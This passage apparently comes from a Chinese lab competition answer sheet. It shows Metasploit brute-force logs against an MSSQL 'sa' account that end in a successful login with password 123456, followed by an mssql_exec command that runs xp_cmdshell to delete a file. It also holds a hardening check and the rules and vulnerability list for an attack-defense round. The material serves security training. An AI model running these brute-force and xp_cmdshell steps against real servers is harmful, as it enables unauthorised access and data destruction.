[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:100 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1000s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:100s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1022 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10sne1 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:11111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:111111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:11111111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:112233 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1212 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:121212 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1213 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1214 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1225 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:123 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:123123 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:123321 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1234 (Incorrect: )
11 / 15
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:12345 (Incorrect: )
[+] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN SUCCESSFUL: WORKSTATION\\sa:123456
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Flag: completed
5. 通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服
务扩展存储过程进行利用,删除WebServ2003服务器场景C:\\1.txt,并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag提交;
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhost 192.168.28.131 msf auxiliary(mssql_exec) > set password 123456
msf auxiliary(mssql_exec) > set cmd cmd.exe /c del \msf auxiliary(mssql_exec) > run
[*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\\1.txt'
output ------
[*] Auxiliary module execution completed
Flag: [*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\\1.txt'
6. 通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2
中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交: W
7. 验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗
透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果的从上向下数第3行内容作为Flag提交; msf auxiliary(mssql_login) > run
12 / 15
[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$% (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^ (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^& (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^&* (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!boerbul (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!boerseun (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!gatvol (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!hotnot (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!kak (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!koedoe (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!likable (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!poes (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!pomp (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!soutpiel (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:.net (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:00000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:007 (Incorrect: )
13 / 15
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:007007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0th (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:100 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1000 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
(三)第二阶段任务书
假定各位选手是某企业信息安全工程师,负责服务器的维护,其中某服务器可能存在着各种问题和漏洞(见以下漏洞列表)。你需要尽快对这台服务器进行加固,需要对其它参赛队的系统进行渗透测试,取得FLAG值并提交到裁判服务器。
提示:
1、本阶段需按赛场IP参数表,自行配置IP地址信息;
2、服务器中的漏洞可能是常规漏洞也可能是系统漏洞;需要加固常规漏洞;并对其它参赛队系统进行渗透测试,取得FLAG值并提交到裁判服务器。
十五分钟之后,各位选手将真正进入分组对抗环节。 注意事项:
注意1:比赛现场存在针对每台靶机的端口扫描机制,任何时候不能人为关闭服务器的TCP端口号21、22、23、80,否则将判令停止比赛,第二阶段分数为0分;
注意2:不能对裁判服务器进行攻击,否则将判令停止比赛,第二阶段分数为0分;
注意3:FLAG值为每台受保护服务器的唯一性标识,每台受保护服务器仅
14 / 15
有一个。靶机的Flag值存放在./root/flaginfo*文件内容当中;每提交1次对手靶机的Flag值自动得分;每当被对手提交1次自身靶机的Flag值自动扣分;每个对手靶机的Flag值只能被自己提交一次;
注意4:在渗透测试环节里,各位选手需要继续保护你的服务器免受各类黑客的攻击,你可以继续加固你的服务器,你也可以选择攻击其他组的保护服务器。
漏洞列表如下:
1. 靶机上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限。
2. 靶机上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限
3. 靶机上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权
4. 操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限。
5. 操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限。
6. 操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。
选手通过以上的所有漏洞点,最后得到其他选手靶机的最高权限,并获取到其他选手靶机上的FLAG值进行提交。
15 / 15